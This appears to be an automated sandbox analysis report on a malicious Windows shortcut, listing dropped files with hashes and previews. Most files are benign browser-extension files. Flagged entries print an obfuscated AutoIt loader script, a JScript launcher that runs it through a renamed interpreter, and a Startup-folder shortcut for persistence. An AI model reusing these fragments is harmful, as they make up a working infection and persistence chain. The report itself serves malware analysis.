                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\da4f0ef1-4ea4-4f35-af83-109610201ab0.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\G

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1266)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1240100
                                                                                                                                                                                                                  Entropy (8bit):5.144277296271024
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:D8V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:DcB7HxicaEmEQD3I1jUZ
                                                                                                                                                                                                                  MD5:078A35D34863F9421F702C3044DA8A1F
                                                                                                                                                                                                                  SHA1:1D34A5EF73992231F1E5857A462359596647E0F6
                                                                                                                                                                                                                  SHA-256:6E32AE2A7776564163BE157BAEE93FCB156A5030D620C71D9FCF33D9A7CBC925
                                                                                                                                                                                                                  SHA-512:67EEB87AEE2567513FC6D5AE241E62D73874980EC18BB77C46DF4191A2EC64A6DB1200F7541B0F6E908B66D39ACE1D483CD1E33E90C165A6DBA01C35536E1541
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                  Entropy (8bit):4.702878525317735
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:RiMIpGXfeNH5E5wWAX+eLCMuL4EkD5yKXW/Zi+0/RaMl85uWAX+eLCMuL4EkD5yn:RiJbNHCwWDeLPqJkDrXW/Zz0tl8wWDek
                                                                                                                                                                                                                  MD5:ADD89CDE8D0D8247BA4058565F6AF1D1
                                                                                                                                                                                                                  SHA1:BDE05EE487B598FC744EBE571202C8BDED415560
                                                                                                                                                                                                                  SHA-256:49456CC7BEEF073EF45D3F3CA43AFFFB39A1885C386F8C24C29A7F3AA86A19AB
                                                                                                                                                                                                                  SHA-512:15E9AB5071BB27D81BC6356AEA39BBD4F07C554E25B1984BE524DDDC86DC861950F5E18237D33A56A2397E30D700BFF22B338CE4F9B596A0F5BDD600A2F6E3DA
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):893608
                                                                                                                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):101
                                                                                                                                                                                                                  Entropy (8bit):4.882484479599994
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5yKXW/Zi+URAAy:HRYF5yjoN723yKXW/Zzyy
                                                                                                                                                                                                                  MD5:E13AD229D874CB584EE9C5EAF00F02A5
                                                                                                                                                                                                                  SHA1:99EFF6F0EFC61DCFDD83E19A7A88355E8D82BF77
                                                                                                                                                                                                                  SHA-256:7448CB3A6A286F6BDF4F036DEAB44060B5E1E17368D2E1C560CCA5EEFEF342A1
                                                                                                                                                                                                                  SHA-512:DB00B1447019348D5D90A1BD0A5E30FF60D0ED92E3308418B659D7B8B5796A04D4CF371D6824574E84F1ACB8D1CFC193E4B7F8EC3EE93862FF6F4C01012BD801
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\New_2025.webp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1200x800, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):163840
                                                                                                                                                                                                                  Entropy (8bit):7.998819356575957
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:3072:H7Uxsy3eSeT4buEoFmO7f4duw1G4J3ZEssmwDLwUeiwaODY:H7byuSeTYCXQdDhwDL3NLOs
                                                                                                                                                                                                                  MD5:0CECA59F492AF57C4F259F23B61A5DE8
                                                                                                                                                                                                                  SHA1:31AAF693A5EBFA6776D174CA8317F4AE3B962C5D
                                                                                                                                                                                                                  SHA-256:9FCE36F9079249E80B733AA5C9180F024027C5774CA55E89742A2CDBF88CFAE1
                                                                                                                                                                                                                  SHA-512:4796A025492188D74D93335DCCE299EB2F205344A82266B7A9EF7F29D797CFB84E024304730BEEEFAD22E7980943D98567B0FFA182E5B626D8C39712C043A711
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....0....*.. .>I .E".!!'...P..ei...=8.9y.\......G..D.#m.........^...=J?z.P.....?..s.......j8...../.>..|...`o..w.[.|..7.........i...].W......K|.........a/._.?i...k.w.....o.w.....}.h.b.e.s.g....A..?..............o.....>..........G...7...W..._.................<.......q~..i..........S..o.^;;..O......>..........f........9...W./.......?z?...}..w.../'.G.g.........k....?....]..._.?....Y.k...G.......?....../.....~....F...[...o../.?......7.........I............~b~......9.g.....W.........P/._...^...sM...`l..T.r....6.w%..x..G.......Y....fWR.*gm.h`Y.....?..)......34.N.+T..:.q..W..b.L7.8.>KXN3..RI%ll......yI........i..".2.W...@.1.....I..7.bXD...t..s.`..c..q\.ujc.*..r.......<.`E,7...C.....e..^h.G...u".>...9W.4..M.....5.(w.~.ls....s.AG.QS.n...]..j.zyk..;.V.2=vN.7.U.C.n.w.A..36;6........}......&....c.....p.3.'..>{...s..a....We.mC....y.Q...Z.C.>.\.....O..."*"X..Z2..7..`.6....~p.~A.rFZ..#E"E.....Jp...K.0.j.?.{k..{.+.QTM-DZ.f.X.j...^.....<.#w..gI.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\PefjSkkhb.exe

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1083904
                                                                                                                                                                                                                  Entropy (8bit):6.306473619816267
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:DrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaB1T:D2EYTb8atv1orq+pEiSDTj1VyvBa3
                                                                                                                                                                                                                  MD5:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                                                                                                                                                                  SHA1:4C4FDEA73E0C98C2C82B6B1232EF7ECF5B99CCD1
                                                                                                                                                                                                                  SHA-256:F1140750BA9FEAD0EF27B715D1BB2AE28864FE611068759F8EF4F8364AF559CB
                                                                                                                                                                                                                  SHA-512:84C3A61A1F7A71E52DFE110CD975F6DA7EA0B2A83FA16F7B46C223ADE7B44D1F299BF0C108268502F144F5C93E0A74AB37B13D24B9540355658119768BF12C2A
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d....^g.........."......4...R.......T.........@....................................qR....`...@...............@..............................\..|........@...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....@.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Sun Dec 15 15:18:48 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                                                                                                                                                                                                                  Entropy (8bit):4.631686127467723
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                  File name:R4qP4YM0QX.lnk
                                                                                                                                                                                                                  File size:1'156 bytes
                                                                                                                                                                                                                  MD5:c994e4260593f7a34502021234dae6a9
                                                                                                                                                                                                                  SHA1:79ce5393d4fa09d39588aca57653b65e46bceb3b
